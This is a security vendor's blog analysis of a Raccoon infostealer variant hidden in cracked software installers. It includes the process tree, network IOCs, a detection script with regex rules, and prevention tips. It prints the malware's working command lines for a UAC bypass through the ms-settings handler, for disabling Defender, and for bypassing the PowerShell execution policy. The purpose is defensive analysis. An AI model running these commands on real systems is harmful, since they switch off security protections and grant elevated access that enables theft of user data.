Against an expanding background of emerging COVID-19 cyber threats, the ReasonLabs research team discovered and reported on a new variant of the Raccoon malware family. First seen in 2019, this new variant is designed to steal user data from browsers. In this article, we analyze the new variant, its attack methods, and its disguise techniques.
Raccoon Malware: What do we know?
Here's what we know so far: the Raccoon malware masquerades as a legitimate, known program installer. The new sample flew under the AV radar: when it was uploaded to VirusTotal over two weeks ago it had only three detections. The file we detected is a Trojan from the Raccoon malware family. It is designed to steal user data from about 60 browsers, and it can take screenshots of the victim machine and capture keyboard input.
The first versions of this malware family seen in the wild were written in C++, but a year later the malware authors have moved to new versions written in Borland Delphi, apparently to make them harder to detect and analyze. The malware ships inside an Inno Setup installer that installs both the original program and the malware.
Execution flow of the Trojan installation
The Inno Setup script runs the regular installation and extracts the malware. The samples we obtained imitate benign program installers (e.g. Bandicam, Revo Uninstaller) but hide a Trojan inside them. The installation of the original program (usually a cracked version of a paid program, so the user already knows the installer did not come from the vendor's site) proceeds as usual, so the user has no reason to suspect that anything else has happened.
The execution flow of the Trojan installation is very apparent, with alarming command lines and the execution of PowerShell and VBScript, which should have raised alarm bells in every security product. However, for some reason, the samples we caught had only three detections on VirusTotal (and as of May 6th, 2020, even 0 detections!), although they were uploaded to VirusTotal more than two weeks ago.
Once installed, the malware disables Windows Defender using PowerShell, uses VBScript to unpack executables from a password-protected zip file contained in the installer, and modifies the registry to disable the administrator consent prompt (ConsentPromptBehaviorAdmin set to 0). The network communication is as sophisticated as in the first versions: web requests to Google Docs (or GitHub) retrieve the malware's command-and-control (CNC) IP address, so the address is not hardcoded in the sample.
The first stage of the Trojan's operation is to extract the CNC address from that response and then send base64-encoded parameters (which decode to bot_id=59407D34-C8C5-44DF-A766 BA8A11CB1CB0_Shayne&config_id=654d0d2e43e786a31eb3ea9dc114b4d91d2014d0&data=null) to "gate/log.php".
Connections
- sn.exe -> 172.217.16.174:443
- sn.exe -> 216.58.208.33:443
- sn.exe -> 34.65.6.73:80
DNS requests
- drive.google.com
- 172.217.16.174
- doc-08-6g-docs.googleusercontent.com
- 216.58.208.33
Process tree of the malicious part:
- cmd.exe (PID: 4204, cmdline: C:\Windows\system32\cmd.exe /c "C:\ProgramData\uacb.cmd")
  - conhost.exe (PID: 3888, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1)
  - reg.exe (PID: 1364, cmdline: REG ADD "HKCU\SOFTWARE\Classes\ms-settings\shell\open\command" /t REG_SZ /d "C:\windows\system32\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f" /f)
  - reg.exe (PID: 5468, cmdline: REG ADD "hkcu\software\classes\ms-settings\shell\open\command" /v DelegateExecute /t REG_SZ /d "" /f)
- cmd.exe (PID: 3968, cmdline: C:\Windows\system32\cmd.exe /c "C:\ProgramData\cloudb.cmd")
  - conhost.exe (PID: 2924, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1)
  - powershell.exe (PID: 3132, cmdline: PowerShell Set-ExecutionPolicy -ExecutionPolicy Bypass -Force)
  - powershell.exe (PID: 5480, cmdline: PowerShell Set-MpPreference -DisableRealtimeMonitoring 1 -DisableIOAVProtection 1 -MAPSReporting Disabled -SubmitSamplesConsent NeverSend)
- wscript.exe (PID: 5264, cmdline: "C:\Windows\System32\WScript.exe" "C:\ProgramData\runner.vbs")
  - cmd.exe (PID: 5336, cmdline: C:\Windows\system32\cmd.exe /c "C:\ProgramData\7z.cmd")
    - conhost.exe (PID: 5404, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1)
    - 7za.exe (PID: 5432, cmdline: "7za.exe" x data.zip -pwvYhE9sFeUuqndPK -oC:\ProgramData)
    - sn.exe (PID: 5560, cmdline: sn.exe)
      - sn.exe (PID: 5840, cmdline: {path})
IOCs:
- *docs.googleusercontent.com
- ip.of.cn.c/gate/log.php
Command lines in the execution flow:
- cmd.exe /c "C:\ProgramData\uacb.cmd"
- REG ADD "HKCU\SOFTWARE\Classes\ms-settings\shell\open\command" /t REG_SZ /d "C:\windows\system32\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f" /f
- REG ADD "hkcu\software\classes\ms-settings\shell\open\command" /v DelegateExecute /t REG_SZ /d "" /f
- cmd.exe /c "C:\ProgramData\cloudb.cmd"
- PowerShell Set-MpPreference -DisableRealtimeMonitoring 1 -DisableIOAVProtection 1 -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
- "WScript.exe" "C:\ProgramData\runner.vbs"
- cmd.exe /c "C:\ProgramData\7z.cmd"
- "7za.exe" x data.zip -pwvYhE9sFeUuqndPK -oC:\ProgramData
- sn.exe
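The command lines above are noisy enough to detect with simple rules. The following script is an added example (not ReasonLabs code) that runs such rules over constructed process-creation events, modelled on the process tree and IOC list above, and flags the registry, Defender, script-host and archive-extraction steps of this dropper; the "pid|image|cmdline" event format is an assumption.

```python
import re
from typing import Dict, List

# Detection rules derived from the command lines in the process tree above (case-insensitive).
RULES = [
    ("uac_bypass_ms_settings_handler",
     re.compile(r"reg\s+add\s+\S*hkcu\\software\\classes\\ms-settings\\shell\\open\\command", re.I)),
    ("uac_consent_prompt_disabled",
     re.compile(r"policies\\system\s+/v\s+ConsentPromptBehaviorAdmin\s+/t\s+REG_DWORD\s+/d\s+0\b", re.I)),
    ("defender_realtime_disabled",
     re.compile(r"Set-MpPreference\b.*-DisableRealtimeMonitoring\s+(1|\$true)\b", re.I)),
    ("execution_policy_bypass",
     re.compile(r"Set-ExecutionPolicy\b.*\bBypass\b", re.I)),
    ("script_host_from_programdata",
     re.compile(r"(wscript|cscript)\.exe\S*\s+\S*\\ProgramData\\\S+\.vbs", re.I)),
    ("password_protected_archive_extract",
     re.compile(r"7za?\.exe\S*\s+x\s+\S+\s+-p\S+", re.I)),
]
# Constructed sample events ("pid|image|cmdline") modelled on the tree above; the last one is benign.
SAMPLE_LOG = """\
1364|reg.exe|REG ADD "HKCU\\SOFTWARE\\Classes\\ms-settings\\shell\\open\\command" /t REG_SZ /d "C:\\windows\\system32\\cmd.exe /c REG ADD HKLM\\software\\microsoft\\windows\\currentversion\\policies\\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f" /f
3132|powershell.exe|PowerShell Set-ExecutionPolicy -ExecutionPolicy Bypass -Force
5480|powershell.exe|PowerShell Set-MpPreference -DisableRealtimeMonitoring 1 -DisableIOAVProtection 1 -MAPSReporting Disabled
5264|wscript.exe|"C:\\Windows\\System32\\WScript.exe" "C:\\ProgramData\\runner.vbs"
5432|7za.exe|"7za.exe" x data.zip -pwvYhE9sFeUuqndPK -oC:\\ProgramData
7001|notepad.exe|"C:\\Windows\\system32\\notepad.exe" C:\\Users\\bob\\notes.txt
"""

def scan(log: str) -> List[Dict[str, object]]:
    """Return one hit per event whose command line trips at least one rule."""
    hits = []
    for raw in log.splitlines():
        if not raw.strip():
            continue
        pid, image, cmdline = raw.split("|", 2)
        matched = [name for name, rx in RULES if rx.search(cmdline)]
        if matched:
            hits.append({"pid": pid, "image": image, "rules": matched})
    return hits

def distinct_techniques(hits: List[Dict[str, object]]) -> int:
    """Number of distinct rules tripped; several in one session is this dropper's signature."""
    return len({r for h in hits for r in h["rules"]})

if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for h in found:
        print(h["pid"], h["image"], ", ".join(h["rules"]))
    print("distinct techniques:", distinct_techniques(found))
```

Each rule on its own will fire on legitimate administration; correlating several of them within one installer's process tree, as the tree above shows, is what separates this dropper from noise.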
SHA256 of the whole installer samples (not the dropped files):
How to prevent malware infection on your device
In general, follow cybersecurity best practices to keep malware from wreaking havoc on your device. These essential tips help prevent malware infections:
- Use antivirus and anti-malware software: Install reputable antivirus and anti-malware software, like RAV Endpoint Protection, on your device. Keep the software updated to ensure it can detect and remove the latest threats.
- Keep operating system and software updated: Regularly update your operating system (OS) and all installed software. Software updates often include security patches that address vulnerabilities exploited by malware.
- Enable automatic updates: Enable automatic updates for your operating system and security software to ensure timely installation of patches and updates.
- Be cautious with email attachments: Avoid opening email attachments or clicking on links in emails from unknown or suspicious sources. Malware often spreads through phishing emails.
- Use strong, unique passwords: Create strong and unique passwords for your accounts. Avoid using the same password across multiple accounts, and consider using a password manager for added security.
- Secure your network: Use a strong, unique password for your Wi-Fi network. Enable WPA3 encryption if available, and regularly change the default login credentials for your router.
- Be selective with downloads: Download software and files only from reputable sources. Avoid downloading cracked or pirated software, as they may contain hidden malware.
- Use a firewall: Enable a firewall on your device to monitor and control incoming and outgoing network traffic. This adds an extra layer of protection against unauthorized access.
- Phishing scam awareness: Learn to recognize phishing attempts. Be cautious with emails, messages, or websites that request personal or sensitive information.
- Back up your data regularly: Regularly back up your important data to an external drive or a secure cloud service. In case of a malware attack, you can restore your data without paying a ransom.
By implementing these preventive measures, you can significantly reduce the risk of malware infections and enhance the overall security of your device. For more information, visit www.reasonlabs.com.